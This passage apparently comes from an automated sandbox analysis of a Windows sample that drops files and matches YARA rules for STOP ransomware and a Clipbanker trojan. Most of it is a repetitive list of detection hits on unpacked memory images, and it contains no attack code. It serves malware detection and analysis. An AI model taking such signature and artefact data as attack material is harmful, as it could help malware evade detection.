info"},"system.highkeywords":{"type":12,"value":"help;support"}},{"system.parsingname":{"type":12,"value":"aaa_settingsgrouppcsystemtouchkeyboard.settingcontent-ms"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagetimeregionspelling"},"system.setting.groupid":{"type":12,"value":"settingsgrouppcsystemtouchkeyboard"},"system.comment":{"type":12,"value":"touch keyboard settings"},"system.highkeywords":{"type":12,"value":""}},{"system.parsingname":{"type":12,"value":"aaa_settingsgrouppcsystemwindowsinfo.settingcontent-	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\appsglobals.txt -> encryptiondesktop.desktop11814{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\elcomsoft password recovery\advanced archive password recovery\archpr.exe11815steam://rungameid/37200011815e1354d8c.581001032d2e9_97d7ef5pp7jwp!app11815xiaomi.miui.miphonemanager11816c:\gog games\the witcher 3 wild hunt\bin\x64\witcher3.exe11816sony.vaio.vaiomoviecreator11817prosiebensat.1digitalgmbh.7tv_fzbtnr0mjybby!app11818{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\adobe\adobe digital editions 3.0\digitaleditions.exe11818{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\intel\intel(r) ssd toolbox\intel ssd toolbox.exe11818{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\nuance\naturallyspeaking14\program\natspeak.exe1181946436stefanpodskubka.remoteterminal_gtq1wtggx9tf0!app11819{6d809377-6af0-444b-8957-a3773f02200e}\tigervnc\vncviewer.exe11820{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\mimo\mimo.exe11820desi..tion_edb36ae7cf19da31_e81d836730e1eada11821{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\prtg network monitor\enterprise co	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.0.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.0.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.2.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.2.build3.exe.b90000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.build3.exe.b90000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.build3.exe.b90000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.0.build3.exe.b90000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
